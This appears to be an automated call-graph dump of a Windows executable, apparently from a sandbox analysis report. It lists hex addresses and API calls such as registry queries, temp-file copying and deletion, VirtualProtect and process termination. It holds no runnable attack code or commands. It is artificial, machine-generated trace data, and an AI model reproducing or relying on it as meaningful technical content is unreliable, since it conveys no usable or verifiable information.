adf2d9 20 API calls __dosmaperr 97052->97102 97053 af045f 97101 ae27ec 26 API calls pre_c_initialization 97053->97101 97062 af0524 97055->97062 97104 add70d 26 API calls 2 library calls 97055->97104 97058 af051f 97060 af059e 97058->97060 97058->97062 97059 af04c6 97103 ae27ec 26 API calls pre_c_initialization 97059->97103 97105 ae27fc 11 API calls _abort 97060->97105 97062->97000 97062->97001 97064 af05aa 97066 ae522d ___scrt_is_nonwritable_in_current_image 97065->97066 97108 ae2f5e EnterCriticalSection 97066->97108 97068 ae5234 97069 ae5259 97068->97069 97074 ae52c7 EnterCriticalSection 97068->97074 97076 ae527b 97068->97076 97112 ae5000 97069->97112 97073 ae52a4 __wsopen_s 97073->97004 97075 ae52d4 LeaveCriticalSection 97074->97075 97074->97076 97075->97068 97109 ae532a 97076->97109 97078->97016 97079->97021 97080->97035 97081->97010 97082->97021 97083->97024 97084->97021 97085->97018 97086->97027 97087->97026 97088->97028 97089->97031 97090->97038 97091->97042 97092->97039 97095 af03d7 97093->97095 97094 af03f2 97094->97052 97095->97094 97106 adf2d9 20 API calls __dosmaperr 97095->97106 97097 af0416 97107 ae27ec 26 API calls pre_c_initialization 97097->97107 97099 af0421 97099->97052 97100->97053 97101->97048 97102->97059 97103->97055 97104->97058 97105->97064 97106->97097 97107->97099 97108->97068 97120 ae2fa6 LeaveCriticalSection 97109->97120 97111 ae5331 97111->97073 97113 ae4c7d __dosmaperr 20 API calls 97112->97113 97115 ae5012 97113->97115 97114 ae501f 97116 ae29c8 _free 20 API calls 97114->97116 97115->97114 97121 ae3405 11 API calls 2 library calls 97115->97121 97118 ae5071 97116->97118 97118->97076 97119 ae5147 EnterCriticalSection 97118->97119 97119->97076 97120->97111 97121->97115 97122 ab1044 97127 ab10f3 97122->97127 97124 ab104a 97163 ad00a3 29 API calls __onexit 97124->97163 97126 ab1054 97164 ab1398 97127->97164 97131 ab116a 97132 aba961 22 API calls 97131->97132 97133 ab1174 97132->97133 97134 aba961 22 API calls 97133->97134 97135 ab117e 97134->97135 97136 aba961 22 API calls 97135->97136 97137 ab1188 97136->97137 97138 aba961 22 API calls 97137->97138 97139 ab11c6 97138->97139 97140 aba961 22 API calls 97139->97140 97141 ab1292 97140->97141 97174 ab171c 97141->97174 97145 ab12c4 97146 aba961 22 API calls 97145->97146 97147 ab12ce 97146->97147 97195 ac1940 97147->97195 97149 ab12f9 97205 ab1aab 97149->97205 97151 ab1315 97152 ab1325 GetStdHandle 97151->97152 97153 ab137a 97152->97153 97154 af2485 97152->97154 97158 ab1387 OleInitialize 97153->97158 97154->97153 97155 af248e 97154->97155 97156 acfddb 22 API calls 97155->97156 97157 af2495 97156->97157 97212 b2011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97157->97212 97158->97124 97160 af249e 97213 b20944 CreateThread 97160->97213 97162 af24aa CloseHandle 97162->97153 97163->97126 97214 ab13f1 97164->97214 97167 ab13f1 22 API calls 97168 ab13d0 97167->97168 97169 aba961 22 API calls 97168->97169 97170 ab13dc 97169->97170 97171 ab6b57 22 API calls 97170->97171 97172 ab1129 97171->97172 97173 ab1bc3 6 API calls 97172->97173 97173->97131 97175 aba961 22 API calls 97174->97175 97176 ab172c 97175->97176 97177 aba961 22 API calls 97176->97177 97178 ab1734 97177->97178 97179 aba961 22 API calls 97178->97179 97180 ab174f 97179->97180 97181 acfddb 22 API calls 97180->97181 97182 ab129c 97181->97182 97183 ab1b4a 97182->97183 97184 ab1b58 97183->97184 97185 aba961 22 API calls 97184->97185 97186 ab1b63 97185->97186 97187 aba961 22 API calls 97186->97187 97188 ab1b6e 97187->97188 97189 aba961 22 API calls 97188->97189 97190 ab1b79 97189->97190 97191 aba961 22 API calls 97190->97191 97192 ab1b84 97191->97192 97193 acfddb 22 API calls 97192->97193 97194 ab1b96 RegisterWindowMessageW 97193->97194 97194->97145 97196 ac1981 97195->97196 97197 ac195d 97195->97197 97221 ad0242 5 API calls __Init_thread_wait 97196->97221 97198 ac196e 97197->97198 97223 ad0242 5 API calls __Init_thread_wait 97197->97223 97198->97149 97200 ac198b 97200->97197 97222 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97200->97222 97202 ac8727 97202->97198 97224 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97202->97224 97206 ab1abb 97205->97206 97207 af272d 97205->97207 97208 acfddb 22 API calls 97206->97208 97225 b23209 23 API calls 97207->97225 97211 ab1ac3 97208->97211 97210 af2738 97211->97151 97212->97160 97213->97162 97226 b2092a 28 API calls 97213->97226 97215 aba961 22 API calls 97214->97215 97216 ab13fc 97215->97216 97217 aba961 22 API calls 97216->97217 97218 ab1404 97217->97218 97219 aba961 22 API calls 97218->97219 97220 ab13c6 97219->97220 97220->97167 97221->97200 97222->97197 97223->97202 97224->97198 97225->97210 97227 b02a00 97241 abd7b0 ISource 97227->97241 97228 abdb11 PeekMessageW 97228->97241 97229 abd807 GetInputState 97229->97228 97229->97241 97231 b01cbe TranslateAcceleratorW 97231->97241 97232 abda04 timeGetTime 97232->97241 97233 abdb8f PeekMessageW 97233->97241 97234 abdb73 TranslateMessage DispatchMessageW 97234->97233 97235 abdbaf Sleep 97252 abdbc0 97235->97252 97236 b02b74 Sleep 97236->97252 97237 b01dda timeGetTime 97346 ace300 23 API calls 97237->97346 97238 ace551 timeGetTime 97238->97252 97241->97228 97241->97229 97241->97231 97241->97232 97241->97233 97241->97234 97241->97235 97241->97236 97241->97237 97247 abd9d5 97241->97247 97255 abec40 235 API calls 97241->97255 97257 abbf40 235 API calls 97241->97257 97259 abdfd0 97241->97259 97287 ac1310 97241->97287 97340 acedf6 97241->97340 97345 abdd50 235 API calls 97241->97345 97347 b23a2a 23 API calls 97241->97347 97348 b2359c 82 API calls __wsopen_s 97241->97348 97242 b02c0b GetExitCodeProcess 97245 b02c21 WaitForSingleObject 97242->97245 97246 b02c37 CloseHandle 97242->97246 97243 b429bf GetForegroundWindow 97243->97252 97245->97241 97245->97246 97246->97252 97248 b02a31 97248->97247 97249 b02ca9 Sleep 97249->97241 97252->97238 97252->97241 97252->97242 97252->97243 97252->97247 97252->97248 97252->97249 97349 b35658 23 API calls 97252->97349 97350 b1e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97252->97350 97351 b1d4dc 47 API calls 97252->97351 97255->97241 97257->97241 97260 abe010 97259->97260 97261 b02f7a 97260->97261 97264 abe075 97260->97264 97262 abec40 235 API calls 97261->97262 97263 b02f8c 97262->97263 97282 abe0dc ISource 97263->97282 97354 b2359c 82 API calls __wsopen_s 97263->97354 97264->97282 97355 ad0242 5 API calls __Init_thread_wait 97264->97355 97268 b02fca 97271 aba961 22 API calls 97268->97271 97268->97282 97269 abe3e1 97269->97241 97270 aba961 22 API calls 97270->97282 97272 b02fe4 97271->97272 97356 ad00a3 29 API calls __onexit 97272->97356 97276 b02fee 97357 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97276->97357 97279 abec40 235 API calls 97279->97282 97281 aba8c7 22 API calls 97281->97282 97282->97269 97282->97270 97282->97279 97282->97281 97283 ac04f0 22 API calls 97282->97283 97284 b2359c 82 API calls 97282->97284 97352 aba81b 41 API calls 97282->97352 97353 aca308 235 API calls 97282->97353 97358 ad0242 5 API calls __Init_thread_wait 97282->97358 97359 ad00a3 29 API calls __onexit 97282->97359 97360 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97282->97360 97361 b347d4 235 API calls 97282->97361 97362 b368c1 235 API calls 97282->97362 97283->97282 97284->97282 97288 ac1376 97287->97288 97289 ac17b0 97287->97289 97291 b06331 97288->97291 97293 ac1940 9 API calls 97288->97293 97462 ad0242 5 API calls __Init_thread_wait 97289->97462 97467 b3709c 235 API calls 97291->97467 97292 ac17ba 97296 ac17fb 97292->97296 97298 ab9cb3 22 API calls 97292->97298 97297 ac13a0 97293->97297 97295 b0633d 97295->97241 97301 b06346 97296->97301 97303 ac182c 97296->97303 97299 ac1940 9 API calls 97297->97299 97307 ac17d4 97298->97307 97300 ac13b6 97299->97300 97300->97296 97302 ac13ec 97300->97302 97468 b2359c 82 API calls __wsopen_s 97301->97468 97302->97301 97312 ac1408 __fread_nolock 97302->97312 97464 abaceb 23 API calls ISource 97303->97464 97306 ac1839 97465 acd217 235 API calls 97306->97465 97463 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97307->97463 97310 b0636e 97469 b2359c 82 API calls __wsopen_s 97310->97469 97311 ac1872 97311->97291 97466 acfaeb 23 API calls 97311->97466 97312->97306 97312->97310 97318 acfddb 22 API calls 97312->97318 97320 acfe0b 22 API calls 97312->97320 97325 abec40 235 API calls 97312->97325 97327 ac152f 97312->97327 97330 b063b2 97312->97330 97334 ac15c7 ISource 97312->97334 97314 ac153c 97317 ac1940 9 API calls 97314->97317 97315 b063d1 97471 b35745 54 API calls _wcslen 97315->97471 97319 ac1549 97317->97319 97318->97312 97323 ac1940 9 API calls 97319->97323 97319->97334 97320->97312 97322 ac171d 97322->97241 97328 ac1563 97323->97328 97325->97312 97326 ac167b ISource 97326->97322 97461 acce17 22 API calls ISource 97326->97461 97327->97314 97327->97315 97333 aba8c7 22 API calls 97328->97333 97328->97334 97329 ac1940 9 API calls 97329->97334 97470 b2359c 82 API calls __wsopen_s 97330->97470 97333->97334 97334->97311 97334->97326 97334->97329 97363 b2f0ec 97334->97363 97372 b26ef1 97334->97372 97452 b3959f 97334->97452 97455 b3958b 97334->97455 97458 b1d4ce 97334->97458 97472 b2359c 82 API calls __wsopen_s 97334->97472 97341 acee09 97340->97341 97342 acee12 97340->97342 97341->97241 97342->97341 97343 acee36 IsDialogMessageW 97342->97343 97344 b0efaf GetClassLongW 97342->97344 97343->97341 97343->97342 97344->97342 97344->97343 97345->97241 97346->97241 97347->97241 97348->97241 97349->97252 97350->97252 97351->97252 97352->97282 97353->97282 97354->97282 97355->97268 97356->97276 97357->97282 97358->97282 97359->97282 97360->97282 97361->97282 97362->97282 97473 ab7510 97363->97473 97367 b2f136 97368 b2f15b 97367->97368 97369 abec40 235 API calls 97367->97369 97371 b2f15f 97368->97371 97524 ab9c6e 22 API calls 97368->97524 97369->97368 97371->97334 97373 aba961 22 API calls 97372->97373 97374 b26f1d 97373->97374 97375 aba961 22 API calls 97374->97375 97376 b26f26 97375->97376 97377 b26f3a 97376->97377 97697 abb567 39 API calls 97376->97697 97379 ab7510 53 API calls 97377->97379 97385 b26f57 _wcslen 97379->97385 97380 b270bf 97383 ab4ecb 94 API calls 97380->97383 97381 b26fbc 97382 ab7510 53 API calls 97381->97382 97386 b26fc8 97382->97386 97384 b270d0 97383->97384 97387 b270e5 97384->97387 97388 ab4ecb 94 API calls 97384->97388 97385->97380 97385->97381 97395 b270e9 97385->97395 97390 aba8c7 22 API calls 97386->97390 97393 b26fdb 97386->97393 97389 aba961 22 API calls 97387->97389 97387->97395 97388->97387 97391 b2711a 97389->97391 97390->97393 97394 aba961 22 API calls 97391->97394 97392 b27027 97397 ab7510 53 API calls 97392->97397 97393->97392 97396 b27005 97393->97396 97399 aba8c7 22 API calls 97393->97399 97398 b27126 97394->97398 97395->97334 97400 ab33c6 22 API calls 97396->97400 97401 b27034 97397->97401 97402 aba961 22 API calls 97398->97402 97399->97396 97403 b2700f 97400->97403 97404 b27047 97401->97404 97405 b2703d 97401->97405 97406 b2712f 97402->97406 97408 ab7510 53 API calls 97403->97408 97698 b1e199 GetFileAttributesW 97404->97698 97409 aba8c7 22 API calls 97405->97409 97407 aba961 22 API calls 97406->97407 97412 b27138 97407->97412 97413 b2701b 97408->97413 97409->97404 97411 b27050 97414 b27063 97411->97414 97417 ab4c6d 22 API calls 97411->97417 97415 ab7510 53 API calls 97412->97415 97416 ab6350 22 API calls 97413->97416 97419 ab7510 53 API calls 97414->97419 97425 b27069 97414->97425 97418 b27145 97415->97418 97416->97392 97417->97414 97543 ab525f 97418->97543 97421 b270a0 97419->97421 97699 b1d076 57 API calls 97421->97699 97422 b27166 97585 ab4c6d 97422->97585 97425->97395 97427 b271a9 97428 aba8c7 22 API calls 97427->97428 97430 b271ba 97428->97430 97429 ab4c6d 22 API calls 97431 b27186 97429->97431 97432 ab6350 22 API calls 97430->97432 97431->97427 97434 ab6b57 22 API calls 97431->97434 97433 b271c8 97432->97433 97435 ab6350 22 API calls 97433->97435 97436 b2719b 97434->97436 97437 b271d6 97435->97437 97438 ab6b57 22 API calls 97436->97438 97439 ab6350 22 API calls 97437->97439 97438->97427 97440 b271e4 97439->97440 97441 ab7510 53 API calls 97440->97441 97442 b271f0 97441->97442 97588 b1d7bc 97442->97588 97444 b27201 97445 b1d4ce 4 API calls 97444->97445 97446 b2720b 97445->97446 97447 ab7510 53 API calls 97446->97447 97450 b27239 97446->97450 97448 b27229 97447->97448 97642 b22947 97448->97642 97451 ab4f39 68 API calls 97450->97451 97451->97395 97723 b37f59 97452->97723 97454 b395af 97454->97334 97456 b37f59 120 API calls 97455->97456 97457 b3959b 97456->97457 97457->97334 97815 b1dbbe lstrlenW 97458->97815 97461->97326 97462->97292 97463->97296 97464->97306 97465->97311 97466->97311 97467->97295 97468->97334 97469->97334 97470->97334 97471->97328 97472->97334 97474 ab7525 97473->97474 97490 ab7522 97473->97490 97475 ab755b 97474->97475 97476 ab752d 97474->97476 97479 ab756d 97475->97479 97486 af50f6 97475->97486 97488 af500f 97475->97488 97525 ad51c6 26 API calls 97476->97525 97526 acfb21 51 API calls 97479->97526 97480 af510e 97480->97480 97482 ab753d 97483 acfddb 22 API calls 97482->97483 97485 ab7547 97483->97485 97487 ab9cb3 22 API calls 97485->97487 97528 ad5183 26 API calls 97486->97528 97487->97490 97489 acfe0b 22 API calls 97488->97489 97495 af5088 97488->97495 97491 af5058 97489->97491 97496 ab9e90 97490->97496 97492 acfddb 22 API calls 97491->97492 97493 af507f 97492->97493 97494 ab9cb3 22 API calls 97493->97494 97494->97495 97527 acfb21 51 API calls 97495->97527 97529 ab6270 97496->97529 97498 ab9fd2 97535 aba4a1 22 API calls __fread_nolock 97498->97535 97500 ab9fec 97500->97367 97501 ab9eb5 97501->97498 97504 aba12c __fread_nolock 97501->97504 97505 aff7c4 97501->97505 97507 aba405 97501->97507 97508 aff699 97501->97508 97512 aba6c3 22 API calls 97501->97512 97519 aba587 22 API calls 97501->97519 97520 abaec9 22 API calls 97501->97520 97523 aba4a1 22 API calls 97501->97523 97534 ab4573 41 API calls _wcslen 97501->97534 97537 ab48c8 23 API calls 97501->97537 97538 ab49bd 22 API calls __fread_nolock 97501->97538 97539 aba673 22 API calls 97501->97539 97504->97505 97504->97507 97540 b196e2 84 API calls __wsopen_s 97505->97540 97507->97500 97542 b196e2 84 API calls __wsopen_s 97507->97542 97513 acfddb 22 API calls 97508->97513 97509 aff7d2 97541 aba4a1 22 API calls __fread_nolock 97509->97541 97512->97501 97514 aff754 97513->97514 97517 acfe0b 22 API calls 97514->97517 97516 aff7e8 97516->97500 97517->97504 97519->97501 97521 aba0db CharUpperBuffW 97520->97521 97536 aba673 22 API calls 97521->97536 97523->97501 97524->97371 97525->97482 97526->97482 97527->97486 97528->97480 97530 acfe0b 22 API calls 97529->97530 97531 ab6295 97530->97531 97532 acfddb 22 API calls 97531->97532 97533 ab62a3 97532->97533 97533->97501 97534->97501 97535->97500 97536->97501 97537->97501 97538->97501 97539->97501 97540->97509 97541->97516 97542->97500 97544 aba961 22 API calls 97543->97544 97545 ab5275 97544->97545 97546 aba961 22 API calls 97545->97546 97547 ab527d 97546->97547 97548 aba961 22 API calls 97547->97548 97549 ab5285 97548->97549 97550 aba961 22 API calls 97549->97550 97551 ab528d 97550->97551 97552 af3df5 97551->97552 97553 ab52c1 97551->97553 97554 aba8c7 22 API calls 97552->97554 97555 ab6d25 22 API calls 97553->97555 97556 af3dfe 97554->97556 97557 ab52cf 97555->97557 97558 aba6c3 22 API calls 97556->97558 97559 ab93b2 22 API calls 97557->97559 97560 ab5304 97558->97560 97561 ab52d9 97559->97561 97562 ab5349 97560->97562 97565 ab5325 97560->97565 97580 af3e20 97560->97580 97561->97560 97563 ab6d25 22 API calls 97561->97563 97700 ab6d25 97562->97700 97564 ab52fa 97563->97564 97567 ab93b2 22 API calls 97564->97567 97565->97562 97570 ab4c6d 22 API calls 97565->97570 97567->97560 97568 ab535a 97569 ab5370 97568->97569 97574 aba8c7 22 API calls 97568->97574 97571 ab5384 97569->97571 97576 aba8c7 22 API calls 97569->97576 97572 ab5332 97570->97572 97575 ab538f 97571->97575 97578 aba8c7 22 API calls 97571->97578 97572->97562 97577 ab6d25 22 API calls 97572->97577 97573 ab6b57 22 API calls 97582 af3ee0 97573->97582 97574->97569 97579 aba8c7 22 API calls 97575->97579 97583 ab539a 97575->97583 97576->97571 97577->97562 97578->97575 97579->97583 97580->97573 97581 ab4c6d 22 API calls 97581->97582 97582->97562 97582->97581 97713 ab49bd 22 API calls __fread_nolock 97582->97713 97583->97422 97586 abaec9 22 API calls 97585->97586 97587 ab4c78 97586->97587 97587->97427 97587->97429 97589 b1d7d8 97588->97589 97590 b1d7f3 97589->97590 97591 b1d7dd 97589->97591 97592 aba961 22 API calls 97590->97592 97593 aba8c7 22 API calls 97591->97593 97641 b1d7ee 97591->97641 97594 b1d7fb 97592->97594 97593->97641 97595 aba961 22 API calls 97594->97595 97596 b1d803 97595->97596 97597 aba961 22 API calls 97596->97597 97598 b1d80e 97597->97598 97599 aba961 22 API calls 97598->97599 97600 b1d816 97599->97600 97601 aba961 22 API calls 97600->97601 97602 b1d81e 97601->97602 97603 aba961 22 API calls 97602->97603 97604 b1d826 97603->97604 97605 aba961 22 API calls 97604->97605 97606 b1d82e 97605->97606 97607 aba961 22 API calls 97606->97607 97608 b1d836 97607->97608 97609 ab525f 22 API calls 97608->97609 97610 b1d84d 97609->97610 97611 ab525f 22 API calls 97610->97611 97612 b1d866 97611->97612 97613 ab4c6d 22 API calls 97612->97613 97614 b1d872 97613->97614 97615 b1d885 97614->97615 97616 ab93b2 22 API calls 97614->97616 97617 ab4c6d 22 API calls 97615->97617 97616->97615 97618 b1d88e 97617->97618 97619 b1d89e 97618->97619 97620 ab93b2 22 API calls 97618->97620 97621 b1d8b0 97619->97621 97622 aba8c7 22 API calls 97619->97622 97620->97619 97623 ab6350 22 API calls 97621->97623 97622->97621 97624 b1d8bb 97623->97624 97715 b1d978 22 API calls 97624->97715 97626 b1d8ca 97716 b1d978 22 API calls 97626->97716 97628 b1d8dd 97629 ab4c6d 22 API calls 97628->97629 97630 b1d8e7 97629->97630 97631 b1d8ec 97630->97631 97632 b1d8fe 97630->97632 97633 ab33c6 22 API calls 97631->97633 97634 ab4c6d 22 API calls 97632->97634 97635 b1d8f9 97633->97635 97636 b1d907 97634->97636 97639 ab6350 22 API calls 97635->97639 97637 b1d925 97636->97637 97638 ab33c6 22 API calls 97636->97638 97640 ab6350 22 API calls 97637->97640 97638->97635 97639->97637 97640->97641 97641->97444 97643 b22954 __wsopen_s 97642->97643 97644 acfe0b 22 API calls 97643->97644 97645 b22971 97644->97645 97646 ab5722 22 API calls 97645->97646 97647 b2297b 97646->97647 97648 b2274e 27 API calls 97647->97648 97649 b22986 97648->97649 97650 ab511f 64 API calls 97649->97650 97651 b2299b 97650->97651 97652 b229bf 97651->97652 97653 b22a6c 97651->97653 97654 b22e66 75 API calls 97652->97654 97655 b22e66 75 API calls 97653->97655 97656 b229c4 97654->97656 97670 b22a38 97655->97670 97660 b22a75 ISource 97656->97660 97721 add583 26 API calls 97656->97721 97658 ab50f5 40 API calls 97659 b22a91 97658->97659 97661 ab50f5 40 API calls 97659->97661 97660->97450 97663 b22aa1 97661->97663 97662 b229ed 97722 add583 26 API calls 97662->97722 97664 ab50f5 40 API calls 97663->97664 97666 b22abc 97664->97666 97667 ab50f5 40 API calls 97666->97667 97668 b22acc 97667->97668 97669 ab50f5 40 API calls 97668->97669 97671 b22ae7 97669->97671 97670->97658 97670->97660 97672 ab50f5 40 API calls 97671->97672 97673 b22af7 97672->97673 97674 ab50f5 40 API calls 97673->97674 97675 b22b07 97674->97675 97676 ab50f5 40 API calls 97675->97676 97677 b22b17 97676->97677 97717 b23017 GetTempPathW GetTempFileNameW 97677->97717 97679 b22b22 97680 ade5eb 29 API calls 97679->97680 97691 b22b33 97680->97691 97681 b22bed 97682 ade678 67 API calls 97681->97682 97683 b22bf8 97682->97683 97685 b22c12 97683->97685 97686 b22bfe DeleteFileW 97683->97686 97684 ab50f5 40 API calls 97684->97691 97687 b22c91 CopyFileW 97685->97687 97693 b22c18 97685->97693 97686->97660 97688 b22ca7 DeleteFileW 97687->97688 97689 b22cb9 DeleteFileW 97687->97689 97688->97660 97718 b22fd8 CreateFileW 97689->97718 97691->97660 97691->97681 97691->97684 97692 addbb3 65 API calls 97691->97692 97692->97691 97694 b222ce 79 API calls 97693->97694 97695 b22c7c 97694->97695 97695->97689 97696 b22c80 DeleteFileW 97695->97696 97696->97660 97697->97377 97698->97411 97699->97425 97701 ab6d91 97700->97701 97702 ab6d34 97700->97702 97703 ab93b2 22 API calls 97701->97703 97702->97701 97704 ab6d3f 97702->97704 97705 ab6d62 __fread_nolock 97703->97705 97706 ab6d5a 97704->97706 97707 af4c9d 97704->97707 97705->97568 97714 ab6f34 22 API calls 97706->97714 97709 acfddb 22 API calls 97707->97709 97710 af4ca7 97709->97710 97711 acfe0b 22 API calls 97710->97711 97712 af4cda 97711->97712 97713->97582 97714->97705 97715->97626 97716->97628 97717->97679 97719 b23013 97718->97719 97720 b22fff SetFileTime CloseHandle 97718->97720 97719->97660 97720->97719 97721->97662 97722->97670 97724 ab7510 53 API calls 97723->97724 97725 b37f90 97724->97725 97749 b37fd5 ISource 97725->97749 97761 b38cd3 97725->97761 97727 b38281 97728 b3844f 97727->97728 97732 b3828f 97727->97732 97802 b38ee4 60 API calls 97728->97802 97731 b3845e 97731->97732 97733 b3846a 97731->97733 97774 b37e86 97732->97774 97733->97749 97734 ab7510 53 API calls 97753 b38049 97734->97753 97739 b382c8 97789 acfc70 97739->97789 97742 b38302 97796 ab63eb 22 API calls 97742->97796 97743 b382e8 97795 b2359c 82 API calls __wsopen_s 97743->97795 97746 b382f3 GetCurrentProcess TerminateProcess 97746->97742 97747 b38311 97797 ab6a50 22 API calls 97747->97797 97749->97454 97750 b3832a 97760 b38352 97750->97760 97798 ac04f0 22 API calls 97750->97798 97751 b384c5 97751->97749 97756 b384d9 FreeLibrary 97751->97756 97753->97727 97753->97734 97753->97749 97793 b1417d 22 API calls __fread_nolock 97753->97793 97794 b3851d 42 API calls _strftime 97753->97794 97754 b38341 97799 b38b7b 75 API calls 97754->97799 97756->97749 97760->97751 97800 ac04f0 22 API calls 97760->97800 97801 abaceb 23 API calls ISource 97760->97801 97803 b38b7b 75 API calls 97760->97803 97762 abaec9 22 API calls 97761->97762 97763 b38cee CharLowerBuffW 97762->97763 97804 b18e54 97763->97804 97767 aba961 22 API calls 97768 b38d2a 97767->97768 97769 ab6d25 22 API calls 97768->97769 97770 b38d3e 97769->97770 97771 ab93b2 22 API calls 97770->97771 97773 b38d48 _wcslen 97771->97773 97772 b38e5e _wcslen 97772->97753 97773->97772 97811 b3851d 42 API calls _strftime 97773->97811 97775 b37ea1 97774->97775 97779 b37eec 97774->97779 97776 acfe0b 22 API calls 97775->97776 97777 b37ec3 97776->97777 97778 acfddb 22 API calls 97777->97778 97777->97779 97778->97777 97780 b39096 97779->97780 97781 b392ab ISource 97780->97781 97785 b390ba _strcat _wcslen 97780->97785 97781->97739 97782 abb6b5 39 API calls 97782->97785 97783 abb567 39 API calls 97783->97785 97784 abb38f 39 API calls 97784->97785 97785->97781 97785->97782 97785->97783 97785->97784 97786 adea0c 21 API calls ___std_exception_copy 97785->97786 97787 ab7510 53 API calls 97785->97787 97814 b1efae 24 API calls _wcslen 97785->97814 97786->97785 97787->97785 97791 acfc85 97789->97791 97790 acfd1d VirtualProtect 97792 acfceb 97790->97792 97791->97790 97791->97792 97792->97742 97792->97743 97793->97753 97794->97753 97795->97746 97796->97747 97797->97750 97798->97754 97799->97760 97800->97760 97801->97760 97802->97731 97803->97760 97806 b18e74 _wcslen 97804->97806 97805 b18f63 97805->97767 97805->97773 97806->97805 97807 b18f68 97806->97807 97810 b18ea9 97806->97810 97807->97805 97813 acce60 41 API calls 97807->97813 97810->97805 97812 acce60 41 API calls 97810->97812 97811->97772 97812->97810 97813->97807 97814->97785 97816 b1dbdc GetFileAttributesW 97815->97816 97817 b1d4d5 97815->97817 97816->97817 97818 b1dbe8 FindFirstFileW 97816->97818 97817->97334 97818->97817 97819 b1dbf9 FindClose 97818->97819 97819->97817 97820 ab105b 97825 ab344d 97820->97825 97822 ab106a 97856 ad00a3 29 API calls __onexit 97822->97856 97824 ab1074 97826 ab345d __wsopen_s 97825->97826 97827 aba961 22 API calls 97826->97827 97828 ab3513 97827->97828 97829 ab3a5a 24 API calls 97828->97829 97830 ab351c 97829->97830 97857 ab3357 97830->97857 97833 ab33c6 22 API calls 97834 ab3535 97833->97834 97835 ab515f 22 API calls 97834->97835 97836 ab3544 97835->97836 97837 aba961 22 API calls 97836->97837 97838 ab354d 97837->97838 97839 aba6c3 22 API calls 97838->97839 97840 ab3556 RegOpenKeyExW 97839->97840 97841 af3176 RegQueryValueExW 97840->97841 97845 ab3578 97840->97845 97842 af320c RegCloseKey 97841->97842 97843 af3193 97841->97843 97842->97845 97855 af321e _wcslen 97842->97855 97844 acfe0b 22 API calls 97843->97844 97846 af31ac 97844->97846 97845->97822 97847 ab5722 22 API calls 97846->97847 97848 af31b7 RegQueryValueExW 97847->97848 97850 af31d4 97848->97850 97852 af31ee ISource 97848->97852 97849 ab4c6d 22 API calls 97849->97855 97851 ab6b57 22 API calls 97850->97851 97851->97852 97852->97842 97853 ab9cb3 22 API calls 97853->97855 97854 ab515f 22 API calls 97854->97855 97855->97845 97855->97849 97855->97853 97855->97854 97856->97824 97858 af1f50 __wsopen_s 97857->97858 97859 ab3364 GetFullPathNameW 97858->97859 97860 ab3386 97859->97860 97861 ab6b57 22 API calls 97860->97861 97862 ab33a4 97861->97862 97862->97833 97863 b03a41 97867 b210c0 97863->97867 97865 b03a4c 97866 b210c0 53 API calls 97865->97866 97866->97865 97868 b210fa 97867->97868 97873 b210cd 97867->97873 97868->97865 97869 b210fc 97879 acfa11 53 API calls 97869->97879 97870 b21101 97872 ab7510 53 API calls 97870->97872 97874 b21108 97872->97874 97873->97868 97873->97869 97873->97870 97876 b210f4 97873->97876 97875 ab6350 22 API calls 97874->97875 97875->97868 97878 abb270 39 API calls 97876->97878 97878->97868 97879->97870 97880 ab1098 97885 ab42de 97880->97885 97884 ab10a7 97886 aba961 22 API calls 97885->97886 97887 ab42f5 GetVersionExW 97886->97887 97888 ab6b57 22 API calls 97887->97888 97889 ab4342 97888->97889 97890 ab93b2 22 API calls 97889->97890 97894 ab4378 97889->97894 97891 ab436c 97890->97891 97893 ab37a0 22 API calls 97891->97893 97892 ab441b GetCurrentProcess IsWow64Process 97895 ab4437 97892->97895 97893->97894 97894->97892 97902 af37df 97894->97902 97896 ab444f LoadLibraryA 97895->97896 97897 af3824 GetSystemInfo 97895->97897 97898 ab449c GetSystemInfo 97896->97898 97899 ab4460 GetProcAddress 97896->97899 97901 ab4476 97898->97901 97899->97898 97900 ab4470 GetNativeSystemInfo 97899->97900 97900->97901 97903 ab447a FreeLibrary 97901->97903 97904 ab109d 97901->97904 97903->97904 97905 ad00a3 29 API calls __onexit 97904->97905 97905->97884 97906 ae90fa 97907 ae9107 97906->97907 97911 ae911f 97906->97911 97956 adf2d9 20 API calls __dosmaperr 97907->97956 97909 ae910c 97957 ae27ec 26 API calls pre_c_initialization 97909->97957 97912 ae917a 97911->97912 97918 ae9117 97911->97918 97958 aefdc4 21 API calls 2 library calls 97911->97958 97914 add955 __fread_nolock 26 API calls 97912->97914 97915 ae9192 97914->97915 97926 ae8c32 97915->97926 97917 ae9199 97917->97918 97919 add955 __fread_nolock 26 API calls 97917->97919 97920 ae91c5 97919->97920 97920->97918 97921 add955 __fread_nolock 26 API calls 97920->97921 97922 ae91d3 97921->97922 97922->97918 97923 add955 __fread_nolock 26 API calls 97922->97923 97924 ae91e3 97923->97924 97925 add955 __fread_nolock 26 API calls 97924->97925 97925->97918 97927 ae8c3e ___scrt_is_nonwritable_in_current_image 97926->97927 97928 ae8c5e 97927->97928 97929 ae8c46 97927->97929 97931 ae8d24 97928->97931 97936 ae8c97 97928->97936 97960 adf2c6 20 API calls __dosmaperr 97929->97960 97967 adf2c6 20 API calls __dosmaperr 97931->97967 97933 ae8c4b 97961 adf2d9 20 API calls __dosmaperr 97933->97961 97934 ae8d29 97968 adf2d9 20 API calls __dosmaperr 97934->97968 97937 ae8cbb 97936->97937 97938 ae8ca6 97936->97938 97959 ae5147 EnterCriticalSection 97937->97959 97962 adf2c6 20 API calls __dosmaperr 97938->97962 97940 ae8c53 __wsopen_s 97940->97917 97943 ae8cb3 97969 ae27ec 26 API calls pre_c_initialization 97943->97969 97944 ae8cab 97963 adf2d9 20 API calls __dosmaperr 97944->97963 97945 ae8cc1 97947 ae8cdd 97945->97947 97948 ae8cf2 97945->97948 97964 adf2d9 20 API calls __dosmaperr 97947->97964 97951 ae8d45 __fread_nolock 38 API calls 97948->97951 97955 ae8ced 97951->97955 97952 ae8ce2 97965 adf2c6 20 API calls __dosmaperr 97952->97965 97966 ae8d1c LeaveCriticalSection __wsopen_s 97955->97966 97956->97909 97957->97918 97958->97912 97959->97945 97960->97933 97961->97940 97962->97944 97963->97943 97964->97952 97965->97955 97966->97940 